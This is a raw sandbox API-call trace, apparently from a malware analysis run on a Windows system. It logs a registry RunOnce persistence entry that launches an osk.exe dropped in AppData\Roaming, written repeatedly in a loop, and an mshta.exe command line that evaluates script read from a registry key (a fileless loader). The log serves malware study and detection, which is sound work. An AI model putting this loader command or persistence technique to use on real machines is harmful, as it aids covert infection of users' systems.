DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.217] KillTimer (hWnd=0x20280, uIDEvent=0x24ad) returned 1 [0112.217] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.217] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.217] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.218] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.218] RegCloseKey (hKey=0x280) returned 0x0 [0112.218] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.218] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.218] SetTimer (hWnd=0x20280, nIDEvent=0x24ae, uElapse=0xa, lpTimerFunc=0x0) returned 0x24ae [0112.218] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.232] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.232] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.232] KillTimer (hWnd=0x20280, uIDEvent=0x24ae) returned 1 [0112.232] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.233] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.233] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.233] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.233] RegCloseKey (hKey=0x280) returned 0x0 [0112.233] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.233] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.234] SetTimer (hWnd=0x20280, nIDEvent=0x24af, uElapse=0xa, lpTimerFunc=0x0) returned 0x24af [0112.234] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.247] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.248] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.248] KillTimer (hWnd=0x20280, uIDEvent=0x24af) returned 1 [0112.248] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.249] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.249] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.249] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.249] RegCloseKey (hKey=0x280) returned 0x0 [0112.249] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.249] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.249] SetTimer (hWnd=0x20280, nIDEvent=0x24b0, uElapse=0xa, lpTimerFunc=0x0) returned 0x24b0 [0112.249] GetMessageW (lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 18 os_tid = 0x8dc Thread: id = 22 os_tid = 0x93c [0067.743] GetCurrentThreadId () returned 0x93c [0067.744] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x74af0000 [0067.744] CoInitialize (pvReserved=0x0) returned 0x0 [0067.744] WaitForSingleObject (hHandle=0x164, dwMilliseconds=0x927c0) returned 0x0 [0074.694] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1006) returned 0x7cc0c8 [0074.695] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2cf8 [0074.695] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x16) returned 0x7c3e00 [0074.695] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7cc0c8, cbMultiByte=8, lpWideCharStr=0x7c3e04, cchWideChar=8 | out: lpWideCharStr="7955381") returned 8 [0074.695] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x108) returned 0x7cd0d8 [0074.696] WaitForSingleObject (hHandle=0x164, dwMilliseconds=0x927c0) returned 0x0 [0074.697] WaitForSingleObject (hHandle=0x164, dwMilliseconds=0x927c0) Thread: id = 25 os_tid = 0x96c [0069.264] GetCurrentThreadId () returned 0x96c Thread: id = 29 os_tid = 0x9ac [0069.676] GetCurrentThreadId () returned 0x9ac Thread: id = 30 os_tid = 0x9bc [0069.676] GetCurrentThreadId () returned 0x9bc Process: id = "8" image_name = "mshta.exe" filename = "c:\\windows\\syswow64\\mshta.exe" page_root = "0x4816f000" os_pid = "0x5bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x620" cmd_line = "mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 17 os_tid = 0x2a8 [0060.714] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fa64 | out: lpSystemTimeAsFileTime=0x18fa64*(dwLowDateTime=0xee463f80, dwHighDateTime=0x1d61645)) [0060.714] GetCurrentProcessId () returned 0x5bc [0060.714] GetCurrentThreadId () returned 0x2a8 [0060.714] GetTickCount () returned 0x1147b0a [0060.714] QueryPerformanceCounter (in: lpPerformanceCount=0x18fa5c | out: lpPerformanceCount=0x18fa5c*=18106890743) returned 1 [0060.714] GetModuleHandleA (lpModuleName=0x0) returned 0x970000 [0060.714] GetStartupInfoA (in: lpStartupInfo=0x18f970 | out: lpStartupInfo=0x18f970*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.715] GetVersionExA (in: lpVersionInformation=0x18f9c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f9c0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0060.715] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x5a0000 [0060.715] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0060.715] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0060.715] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0060.715] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0060.716] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0060.716] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.716] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.716] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.716] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.716] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.716] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.716] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.716] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.717] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.717] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.717] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.717] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.717] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.717] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.717] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.717] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.717] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x76c10000 [0060.717] GetProcAddress (hModule=0x76c10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c2004f [0060.718] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.718] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.718] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.718] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.718] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.718] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.718] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.718] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.719] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.719] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.719] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.719] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.719] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.719] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.719] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.719] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.720] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.720] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.720] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.720] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.720] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.720] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.720] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.720] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.723] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.723] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.723] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.723] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.723] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.723] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.724] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x214) returned 0x5a07d0 [0060.724] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.724] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.724] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.724] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.724] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.724] GetStartupInfoA (in: lpStartupInfo=0x18f8f4 | out: lpStartupInfo=0x18f8f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.725] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x480) returned 0x5a09f0 [0060.725] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0060.725] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0060.725] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0060.725] SetHandleCount (uNumber=0x20) returned 0x20 [0060.725] GetCommandLineA () returned="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" [0060.725] GetEnvironmentStringsW () returned 0x6201f0* [0060.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0060.725] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x565) returned 0x5a0e78 [0060.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x5a0e78, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0060.725] FreeEnvironmentStringsW (penv=0x6201f0) returned 1 [0060.725] GetLastError () returned 0x0 [0060.725] SetLastError (dwErrCode=0x0) [0060.725] GetLastError () returned 0x0 [0060.725] SetLastError (dwErrCode=0x0) [0060.725] GetLastError () returned 0x0 [0060.726] SetLastError (dwErrCode=0x0) [0060.726] GetACP () returned 0x4e4 [0060.726] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x220) returned 0x5a13e8 [0060.726] GetLastError () returned 0x0 [0060.726] SetLastError (dwErrCode=0x0) [0060.726] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f8cc | out: lpCPInfo=0x18f8cc) returned 1 [0060.726] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f398 | out: lpCPInfo=0x18f398) returned 1 [0060.726] GetLastError () returned 0x0 [0060.726] SetLastError (dwErrCode=0x0) [0060.726] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f328 | out: lpCharType=0x18f328) returned 1 [0060.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x18f118, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏\x97Ā") returned 256 [0060.726] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏\x97Ā", cchSrc=256, lpCharType=0x18f3ac | out: lpCharType=0x18f3ac) returned 1 [0060.726] GetLastError () returned 0x0 [0060.726] SetLastError (dwErrCode=0x0) [0060.726] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0060.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.726] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x18f0b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼬?Ā") returned 256 [0060.727] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼬?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.727] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼬?Ā", cchSrc=256, lpDestStr=0x18eea8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0060.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18f6ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x98\x94ÝÙäø\x18", lpUsedDefaultChar=0x0) returned 256 [0060.727] GetLastError () returned 0x0 [0060.727] SetLastError (dwErrCode=0x0) [0060.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7ac, cbMultiByte=256, lpWideCharStr=0x18f0d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼌?Ā") returned 256 [0060.727] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鼌?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.727] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 